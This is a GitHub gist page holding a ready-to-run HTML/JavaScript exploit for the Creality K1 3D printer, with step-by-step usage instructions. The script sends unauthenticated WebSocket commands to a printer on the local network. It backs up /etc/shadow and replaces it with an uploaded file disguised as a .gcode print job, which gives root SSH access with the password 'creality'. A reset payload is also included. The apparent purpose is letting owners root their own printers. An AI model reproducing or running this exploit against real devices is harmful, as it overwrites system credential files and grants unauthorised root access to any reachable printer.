Created
June 5, 2023 21:29
-
-
Save blakadder/9e6e8ab633b9731d934f02cfcc4db246 to your computer and use it in GitHub Desktop.
Creality K1 exploit method A (thanks to https://www.youtube.com/c/SorkinDmitry)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>K1 exploit for K3D Chat</title> | |
| <script> | |
| const patchedShadowStr = "root:$5$/iMbCgHty3$rM7UZICj9tmUe13BcAOUgVvpa.sSMV4k/t2Yes64ZZ9:::::::\ndaemon:*:::::::\nbin:*:::::::\nsys:*:::::::\nsync:*:::::::\nmail:*:::::::\nwww-data:*:::::::\noperator:*:::::::\nnobody:*:::::::\ndbus:*:::::::\n" | |
| const patchedShadowBlob = new Blob([patchedShadowStr], { type: "text/plain" }) | |
| function sendPayload(payload,needAlert = true) { | |
| var ip = document.getElementsByName("ip")[0].value | |
| var socket = new WebSocket('ws://' + ip + ':9999') | |
| socket.onopen = function(e) { | |
| socket.send(payload); | |
| if (needAlert) { | |
| setTimeout(function(){ | |
| if (socket.readyState === WebSocket.OPEN) { | |
| alert('Payload sent!') | |
| socket.close() | |
| } else { | |
| alert('Payload failed!') | |
| } | |
| }, 100) | |
| } | |
| } | |
| } | |
| function patchShadow() { | |
| var ip = document.getElementsByName("ip")[0].value | |
| console.log('Backing up current shadow file...') | |
| sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/etc/shadow:/etc/shadow.bak"}}', false) | |
| setTimeout(function(){ | |
| console.log('Uploading new shadow file...') | |
| const fd = new FormData() | |
| fd.append('file', patchedShadowBlob, 'new_shadow.gcode') | |
| const xhr = new XMLHttpRequest(); | |
| xhr.onload = function(e) { | |
| if (xhr.status == 200) { | |
| console.log('Applying new shadow file...') | |
| sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/new_shadow.gcode:/etc/shadow"}}', false) | |
| alert('Payload sent! New SSH credentials should be:\nroot:creality') | |
| } else { | |
| alert('Upload failed!') | |
| } | |
| } | |
| xhr.open('POST', 'http://' + ip + '/upload/new_shadow.gcode', true); | |
| xhr.send(fd) | |
| }, 250) | |
| } | |
| function moveShadow() { | |
| sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/shadow.gcode:/etc/shadow"}}') | |
| } | |
| function reset() { | |
| sendPayload('{"method":"set","params":{"resetSystem":15}}') | |
| } | |
| </script> | |
| </head> | |
| <body> | |
| IP: <input type="text" name="ip"/><br> | |
| Unlock SSH: <button onclick="patchShadow()">Method A</button> <button onclick="moveShadow()">Method B</button><br><br> | |
| Reset system if something went wrong: <button onclick="reset()">Reset</button> | |
| </body> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| How to apply the exploit: | |
| 1. start k3d_k1_exploit.html | |
| 2. input K1 lan ip | |
| 3. click "Method A" | |
| 4. login over ssh as root with password `creality` | |
| Exploit is entirely created by Dmitry Sorkin (https://www.youtube.com/c/SorkinDmitry) | |
| More information and a filesystem dump available in Dmitry's telegram channel: https://t.me/dsorkin |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment